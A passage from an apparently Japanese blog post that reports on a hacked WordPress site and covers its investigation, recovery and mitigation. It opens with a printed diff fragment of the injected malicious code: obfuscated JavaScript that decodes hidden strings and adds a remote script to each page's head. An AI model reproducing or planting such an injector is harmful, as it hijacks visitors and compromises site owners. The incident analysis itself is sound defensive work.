6A\x44\x6C\x4D\x4B\x4E\x59\x45\x58\x44\x69\x31\x48\x44\x74\x38\x4F\x6F\x77\x72\x70\x72\x77\x35\x37\x44\x74\x32\x77\x6F\x44\x63\x4B\x61\x77\x37\x62\x43\x73\x63\x4F\x71\x53\x4D\x4B\x55\x77\x71\x50\x43\x74\x73\x4F\x6C\x52\x4D\x4F\x43\x4F\x30\x35\x65\x77\x34\x76\x44\x6F\x4D\x4B\x46\x77\x35\x64\x44\x77\x70\x41\x73\x77\x6F\x74\x2B\x77\x34\x6F\x72\x47\x58\x6C\x73\x77\x70\x30\x71\x58\x63\x4F\x73\x4B\x4D\x4F\x6A\x77\x71\x58\x43\x6F\x4D\x4B\x72\x77\x36\x73\x30\x62\x63\x4F\x2B\x77\x36\x56\x6C\x55\x6E\x76\x43\x68\x73\x4F\x4D\x77\x36\x35\x50\x77\x36\x54\x44\x76\x78\x76\x43\x68\x43\x33\x44\x71\x4D\x4B\x7A\x77\x6F\x70\x56\x77\x36\x4C\x43\x74\x33\x74\x59\x64\x6A\x62\x44\x6E\x6D\x30\x65\x45\x53\x48\x44\x74\x73\x4B\x64\x77\x37\x59\x52\x77\x6F\x58\x43\x67\x56\x64\x53\x77\x34\x4C\x44\x74\x63\x4B\x35\x66\x73\x4B\x63\x77\x72\x6F\x55\x77\x70\x7A\x43\x76\x38\x4F\x32\x56\x31\x44\x44\x6D\x6B\x58\x44\x68\x52\x51\x4C\x47\x73\x4F\x6B\x77\x6F\x6C\x32\x4A\x63\x4B\x56\x77\x34\x56\x74\x77\x35\x66\x43\x67\x51\x6C\x6C\x44\x73\x4F\x67\x77\x72\x6A\x44\x74\x4D\x4F\x2B\x4B\x6D\x73\x36\x77\x35\x39\x6A\x77\x37\x37\x43\x68\x31\x44\x43\x73\x44\x52\x69\x77\x34\x33\x43\x6F\x33\x6E\x43\x73\x63\x4F\x59\x77\x36\x6C\x72\x77\x72\x70\x33\x58\x73\x4B\x36\x77\x72\x6F\x70\x77\x71\x6A\x43\x6D\x63\x4F\x30\x77\x70\x55\x4F\x63\x6C\x48\x44\x6B\x69\x76\x43\x75\x48\x4C\x44\x6B\x63\x4B\x72\x77\x35\x66\x44\x70\x45\x76\x44\x70\x32\x76\x43\x75\x38\x4B\x32\x4E\x67\x54\x44\x69\x38\x4F\x6A\x77\x37\x44\x44\x73\x63\x4F\x4F\x46\x73\x4B\x49\x77\x70\x62\x44\x6E\x58\x59\x37\x77\x6F\x38\x39\x52\x77\x44\x43\x69\x63\x4B\x58\x62\x47\x56\x6E\x49\x42\x62\x44\x6D\x4D\x4F\x45\x77\x35\x62\x43\x6B\x38\x4F\x4D\x52\x4D\x4F\x77\x64\x4D\x4B\x50\x77\x35\x54\x44\x6D\x32\x45\x31\x77\x72\x37\x44\x6A\x57\x37\x44\x74\x73\x4F\x32\x41\x63\x4F\x56\x77\x36\x67\x65\x55\x54\x77\x2F\x77\x34\x4D\x73\x77\x71\x6B\x2B\x77\x37\x48\x44\x75\x4D\x4B\x6E\x77\x72\x38\x31\x4E\x4D\x4B\x58\x77\x36\x33\x44\x74\x6A\x66\x43\x67\x73\x4B\x6B\x77\x37\x64\x39\x77\x6F\x50\x43\x6E\x56\x70\x42\x77\x36\x31\x6F\x42\x4D\x4B\x39\x65\x78\x63\x4D\x55\x73\x4F\x73\x4A\x73\x4B\x2B\x61\x38\x4B\x53\x55\x31\x42\x4A\x53\x4D\x4F\x74\x66\x48\x70\x51\x77\x70\x6A\x44\x6F\x73\x4F\x63\x77\x35\x6E\x44\x6F\x63\x4F\x52\x77\x35\x45\x6B\x77\x71\x4C\x44\x6F\x4D\x4F\x42\x77\x6F\x35\x35\x77\x34\x6A\x44\x69\x33\x34\x75\x63\x38\x4F\x43\x44\x48\x6A\x43\x68\x33\x6E\x44\x6A\x43\x48\x44\x67\x73\x4B\x52\x4B\x73\x4F\x6F\x77\x35\x76\x43\x68\x77\x78\x64\x77\x36\x4C\x43\x6A\x38\x4F\x5A\x57\x67\x49\x61\x77\x71\x44\x43\x68\x4D\x4F\x51\x66\x63\x4F\x6C\x77\x36\x50\x43\x75\x73\x4F\x74\x4B\x38\x4F\x2B\x77\x35\x6A\x44\x76\x38\x4B\x46\x65\x32\x59\x57\x57\x73\x4F\x36\x47\x33\x72\x44\x75\x41\x3D\x3D","\x73\x68\x69\x66\x74","\x70\x75\x73\x68","\x55\x44\x50\x4D\x49\x55","\x72\x65\x74\x75\x72\x6E\x20\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x20","\x7B\x7D\x2E\x63\x6F\x6E\x73\x74\x72\x75\x63\x74\x6F\x72\x28\x22\x72\x65\x74\x75\x72\x6E\x20\x74\x68\x69\x73\x22\x29\x28\x20\x29","\x29\x3B","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","\x61\x74\x6F\x62","","\x72\x65\x70\x6C\x61\x63\x65","\x63\x68\x61\x72\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x6C\x65\x6E\x67\x74\x68","\x25","\x73\x6C\x69\x63\x65","\x30\x30","\x74\x6F\x53\x74\x72\x69\x6E\x67","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x58\x70\x44\x42\x61\x53","\x53\x4A\x4E\x65\x62\x4B","\x6C\x75\x42\x49\x48\x6B","\x30\x78\x30","\x43\x31\x25\x4A","\x30\x78\x31","\x49\x39\x5A\x77","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x69\x64","\x30\x78\x32","\x36\x65\x21\x42","\x30\x78\x33","\x5A\x41\x54\x25","\x30\x78\x34","\x76\x57\x51\x5D","\x30\x78\x35","\x30\x78\x36","\x4B\x4D\x61\x25","\x30\x78\x37","\x6C\x6A\x70\x56"];var _0x69b4=[_0x4c2c[0],_0x4c2c[1],_0x4c2c[2],_0x4c2c[3],_0x4c2c[4],_0x4c2c[5],_0x4c2c[6],_0x4c2c[7],_0x4c2c[8],_0x4c2c[9],_0x4c2c[10],_0x4c2c[11],_0x4c2c[12],_0x4c2c[13],_0x4c2c[14],_0x4c2c[15],_0x4c2c[16],_0x4c2c[17],_0x4c2c[18],_0x4c2c[19],_0x4c2c[20],_0x4c2c[21],_0x4c2c[22],_0x4c2c[23],_0x4c2c[24],_0x4c2c[25],_0x4c2c[26],_0x4c2c[27],_0x4c2c[28],_0x4c2c[29],_0x4c2c[30],_0x4c2c[31],_0x4c2c[32],_0x4c2c[33],_0x4c2c[34],_0x4c2c[35],_0x4c2c[36],_0x4c2c[37],_0x4c2c[38],_0x4c2c[39],_0x4c2c[40],_0x4c2c[41],_0x4c2c[42],_0x4c2c[43],_0x4c2c[44],_0x4c2c[45],_0x4c2c[46],_0x4c2c[47],_0x4c2c[48]];var _0x53ac=[_0x69b4[0],_0x69b4[1],_0x69b4[2],_0x69b4[3],_0x69b4[4],_0x69b4[5],_0x69b4[6],_0x69b4[7]];(function(_0xe0fbx3,_0xe0fbx4){var _0xe0fbx5=function(_0xe0fbx6){while(--_0xe0fbx6){_0xe0fbx3[_0x69b4[9]](_0xe0fbx3[_0x69b4[8]]())}};_0xe0fbx5(++_0xe0fbx4)}(_0x53ac,0x6b));var _0x4824=function(_0xe0fbx8,_0xe0fbx9){_0xe0fbx8= _0xe0fbx8- 0x0;var _0xe0fbxa=_0x53ac[_0xe0fbx8];if(_0x4824[_0x69b4[10]]=== undefined){(function(){var _0xe0fbxb=function(){var _0xe0fbxc;try{_0xe0fbxc= Function(_0x69b4[11]+ _0x69b4[12]+ _0x69b4[13])()}catch(_0x21cc70){_0xe0fbxc= window};return _0xe0fbxc};var _0xe0fbxd=_0xe0fbxb();var _0xe0fbxe=_0x69b4[14];_0xe0fbxd[_0x69b4[15]]|| (_0xe0fbxd[_0x69b4[15]]= function(_0xe0fbxf){var _0xe0fbx10=String(_0xe0fbxf)[_0x69b4[17]](/=+$/,_0x69b4[16]);for(var _0xe0fbx11=0x0,_0xe0fbx12,_0xe0fbx13,_0xe0fbx14=0x0,_0xe0fbx15=_0x69b4[16];_0xe0fbx13= _0xe0fbx10[_0x69b4[18]](_0xe0fbx14++);~_0xe0fbx13&& (_0xe0fbx12= _0xe0fbx11% 0x4?_0xe0fbx12* 0x40+ _0xe0fbx13:_0xe0fbx13,_0xe0fbx11++ % 0x4)?_0xe0fbx15+= String[_0x69b4[19]](0xff& _0xe0fbx12>> (-0x2* _0xe0fbx11 & 0x6)):0x0){_0xe0fbx13= _0xe0fbxe[_0x69b4[20]](_0xe0fbx13)};return _0xe0fbx15})}());var _0xe0fbx16=function(_0xe0fbx17,_0xe0fbx9){var _0xe0fbx18=[],_0xe0fbx19=0x0,_0xe0fbx1a,_0xe0fbx1b=_0x69b4[16],_0xe0fbx1c=_0x69b4[16];_0xe0fbx17= atob(_0xe0fbx17);for(var _0xe0fbx1d=0x0,_0xe0fbx1e=_0xe0fbx17[_0x69b4[21]];_0xe0fbx1d< _0xe0fbx1e;_0xe0fbx1d++){_0xe0fbx1c+= _0x69b4[22]+ (_0x69b4[24]+ _0xe0fbx17[_0x69b4[26]](_0xe0fbx1d)[_0x69b4[25]](0x10))[_0x69b4[23]](-0x2)};_0xe0fbx17= decodeURIComponent(_0xe0fbx1c);for(var _0xe0fbx1f=0x0;_0xe0fbx1f< 0x100;_0xe0fbx1f++){_0xe0fbx18[_0xe0fbx1f]= _0xe0fbx1f};for(_0xe0fbx1f= 0x0;_0xe0fbx1f< 0x100;_0xe0fbx1f++){_0xe0fbx19= (_0xe0fbx19+ _0xe0fbx18[_0xe0fbx1f]+ _0xe0fbx9[_0x69b4[26]](_0xe0fbx1f% _0xe0fbx9[_0x69b4[21]]))% 0x100;_0xe0fbx1a= _0xe0fbx18[_0xe0fbx1f];_0xe0fbx18[_0xe0fbx1f]= _0xe0fbx18[_0xe0fbx19];_0xe0fbx18[_0xe0fbx19]= _0xe0fbx1a};_0xe0fbx1f= 0x0;_0xe0fbx19= 0x0;for(var _0xe0fbx20=0x0;_0xe0fbx20< _0xe0fbx17[_0x69b4[21]];_0xe0fbx20++){_0xe0fbx1f= (_0xe0fbx1f+ 0x1)% 0x100;_0xe0fbx19= (_0xe0fbx19+ _0xe0fbx18[_0xe0fbx1f])% 0x100;_0xe0fbx1a= _0xe0fbx18[_0xe0fbx1f];_0xe0fbx18[_0xe0fbx1f]= _0xe0fbx18[_0xe0fbx19];_0xe0fbx18[_0xe0fbx19]= _0xe0fbx1a;_0xe0fbx1b+= String[_0x69b4[19]](_0xe0fbx17[_0x69b4[26]](_0xe0fbx20)^ _0xe0fbx18[(_0xe0fbx18[_0xe0fbx1f]+ _0xe0fbx18[_0xe0fbx19])% 0x100])};return _0xe0fbx1b};_0x4824[_0x69b4[27]]= _0xe0fbx16;_0x4824[_0x69b4[28]]= {};_0x4824[_0x69b4[10]]=  !![]};var _0xe0fbx21=_0x4824[_0x69b4[28]][_0xe0fbx8];if(_0xe0fbx21=== undefined){if(_0x4824[_0x69b4[29]]=== undefined){_0x4824[_0x69b4[29]]=  !![]};_0xe0fbxa= _0x4824[_0x69b4[27]](_0xe0fbxa,_0xe0fbx9);_0x4824[_0x69b4[28]][_0xe0fbx8]= _0xe0fbxa}else {_0xe0fbxa= _0xe0fbx21};return _0xe0fbxa};var _0x4739d5=[_0x4824(_0x69b4[30],_0x69b4[31]),_0x4824(_0x69b4[32],_0x69b4[33]),_0x69b4[34],_0x69b4[35],_0x69b4[36],_0x69b4[37],_0x4824(_0x69b4[38],_0x69b4[39]),_0x4824(_0x69b4[40],_0x69b4[41]),_0x4824(_0x69b4[42],_0x69b4[43]),_0x4824(_0x69b4[44],_0x69b4[43]),_0x4824(_0x69b4[45],_0x69b4[46]),_0x4824(_0x69b4[47],_0x69b4[48])];var _0x3be76d=[_0x4739d5[0x0],_0x4739d5[0x1],_0x4739d5[0x2],_0x4739d5[0x3],_0x4739d5[0x4],_0x4739d5[0x5],_0x4739d5[0x6],_0x4739d5[0x7],_0x4739d5[0x8],_0x4739d5[0x9],_0x4739d5[0xa],_0x4739d5[0xb]];var _0x4f3f17=[_0x3be76d[0x0],_0x3be76d[0x1],_0x3be76d[0x2],_0x3be76d[0x3],_0x3be76d[0x4],_0x3be76d[0x5],_0x3be76d[0x6],_0x3be76d[0x7],_0x3be76d[0x8],_0x3be76d[0x9],_0x3be76d[0xa],_0x3be76d[0xb]];var _0x4d0c89=[_0x4f3f17[0x0],_0x4f3f17[0x1],_0x4f3f17[0x2],_0x4f3f17[0x3],_0x4f3f17[0x4],_0x4f3f17[0x5],_0x4f3f17[0x6],_0x4f3f17[0x7],_0x4f3f17[0x8],_0x4f3f17[0x9],_0x4f3f17[0xa],_0x4f3f17[0xb]];var _0x572eac=[_0x4d0c89[0x0],_0x4d0c89[0x1],_0x4d0c89[0x2],_0x4d0c89[0x3],_0x4d0c89[0x4],_0x4d0c89[0x5],_0x4d0c89[0x6],_0x4d0c89[0x7],_0x4d0c89[0x8],_0x4d0c89[0x9],_0x4d0c89[0xa],_0x4d0c89[0xb]];var _0x2b0b54=[_0x572eac[0x0],_0x572eac[0x1],_0x572eac[0x2],_0x572eac[0x3],_0x572eac[0x4],_0x572eac[0x5],_0x572eac[0x6],_0x572eac[0x7],_0x572eac[0x8],_0x572eac[0x9],_0x572eac[0xa],_0x572eac[0xb]];(function(){var _0xe0fbx28=document[_0x2b0b54[0x1]](_0x2b0b54[0x0]);_0xe0fbx28[_0x2b0b54[0x2]]= _0x2b0b54[0x3];_0xe0fbx28[_0x2b0b54[0x4]]=  !![];_0xe0fbx28[_0x2b0b54[0x5]]= _0x2b0b54[0x6];_0xe0fbx28[_0x2b0b54[0x7]]= _0x2b0b54[0x8];var _0xe0fbx29=document[_0x2b0b54[0x9]](_0x2b0b54[0x0])[0x0];_0xe0fbx29[_0x2b0b54[0xb]][_0x2b0b54[0xa]](_0xe0fbx28,_0xe0fbx29)}());</script></head>
---
> </head>

改ざんされたWordPressの公開ディレクトリに対して、この特徴的な変数名 _0x4c2c で grep してみたら、ファイルパスでuniqueを取ると540件のJSファイルとPHPファイルが汚染していました。

  • js 533件
    • wp-admin/js 配下のjsファイル
    • wp-content 配下のjsファイル
    • wp-includes/js 配下のjsファイル
  • wp-content/themes/*/header.php 5件
  • wp-includes/theme-compat/header.php 1件
  • wp-includes/theme-compat/header-embed.php 1件

参考までに 汚染されたファイルリストを公開します。
Gist 汚染ファイルリスト

復旧対応 & 暫定対応

復旧対応と暫定対応でやったことです。

復旧対応

資材が大量に汚染されていることがわかったので、手修正はせず、masterブランチ の最新状態で再度リリースを行い、念の為DB内部も汚染させられている可能性も疑い、正常稼働が確認できていた断面のDBダンプファイルからDB内容も復元しました。

このリリース後にブラウザのキャッシュクリアしてからサイト確認を行い、
問題のリダイレクト事象が起きないことを確認できました。

暫定対応

改ざん手口が断定できないので、仮説を立てた上で対策を行いました。

  • 仮説
    • 公開ディレクトリ配下のJSがほとんど改ざんされており、類似の難読化コードが仕込まれていたという事実から、なんらかのWordPressの脆弱性をWebアクセス経由で資材の改ざんが行われたのでは?
  • 対策
    • WordPressの公開ディレクトリのパーミッションをWebアクセス経由で更新できないよう nginx の所有者から 一般ユーザの 所有者に変更。(Webサーバはnginx利用)
  • 副作用
    • WP管理画面経由でのプラグインの更新ができなくなり不便に。

対応後は同インシデント事象は発生していません。

調査ステップの振り返り

今回、調査〜原因特定〜復旧〜暫定対処 まで半日ほどかかりました。

特に改ざんされたソース箇所、範囲の特定に時間がかかり、今思えば、改ざん前後でdiff取っていたら、もっと早く復旧できたなって思っています。

git管理下なら git diff

AWSのCodeDeployを使ってデプロイしていたので公開中の資材は git管理下にはなっておらず、
事象当時、私の環境では git diff できなかったですが、git管理化なら、git diff すれば、
改ざん箇所が一目瞭然だったなーと。

今後は、CodeDeployの自動デプロイ後に git init & git commitしてgit管理下にする対応検討中です。

git管理下でない場合は HTMLのdiff

今回のインシデントではこの方法でリダイレクトの原因、範囲を特定しました。

改ざん前後に レンダリングされたHTMLの diff を取る。
検品環境は正常動作していたので検品環境のレスポンスと本番環境の改ざん後のレスポンスを比較しました。

それで改ざん箇所のJSを特定したら、他にも改ざんされているファイルがないか 特徴的な文字列で grep しておおよその改ざん範囲を調べました。以下、コマンド例。

$ find ./public_html -type f -print | xargs grep 特徴的な文字列 > ~/duty_list.txt

調査プロセスで無駄だったこと

事象から、JSの仕業であるという仮説を立てたところまでは、おそらく正解。
その後、どうやって改ざんされたのか考えて復旧、対策を検討しようとしたのが、思考の順番が違ったかなと。事実ベースで上に上げた diff をとってから、検討範囲を絞り込むほうが効率良かったと反省。

  • 改ざんされ方で妄想したこと
    • 1.サーバに侵入されて、改ざんされた。
    • 2.WP管理画面のパスワードが突破されて、管理画面経由で改ざんされた。
    • 3.利用中のWPプラグイン元が既に汚染されており、プラグイン更新がきっかけで飛び火した。
    • 4.その他

1は踏み台サーバの鍵が漏れていたら、他のサーバにも被害あるので、薄そうと判断。
2はDBスナップを戻しても、事態は変わらずだったので、薄そうと判断。
3を疑い、時間浪費してしまった。1つ1つ wp-content/plugin から消してはサイトアクセスを試して、犯人探しをしていたが、結果的に、ほとんどのプラグインのJSが汚染されていたので、無駄なプロセスだった。

事前の備えで救われたこと

  • バックアップ取っていたこと。(DB, wp-content配下, ソース)
  • 正常稼働が確認できる検品環境があったこと。

あとがき

インシデント対応は突然やってきます。

障害対応も疲弊しますが、悪意のある見えない攻撃者に対して怒り的な感情が生まれ、
自分たちに直接的な落ち度がある障害対応より、対応当事者として意味付けに歪みがあり精神的に障害対応より疲弊しました。

脆弱性のあるシステムを提供している自分たちが悪いので、堅牢なシステムを作りをしていきたいと思っています。関係者には迷惑をかけてしまい申し訳ないですが、ある意味貴重な経験ができました。

この事象について情報お持ちの方コメントもらえると嬉しいです。

Why do not you register as a user and use Qiita more conveniently?
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
Comments
Sign up for free and join this conversation.
If you already have a Qiita account
Why do not you register as a user and use Qiita more conveniently?
You need to log in to use this function. Qiita can be used more conveniently after logging in.
You seem to be reading articles frequently this month. Qiita can be used more conveniently after logging in.
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away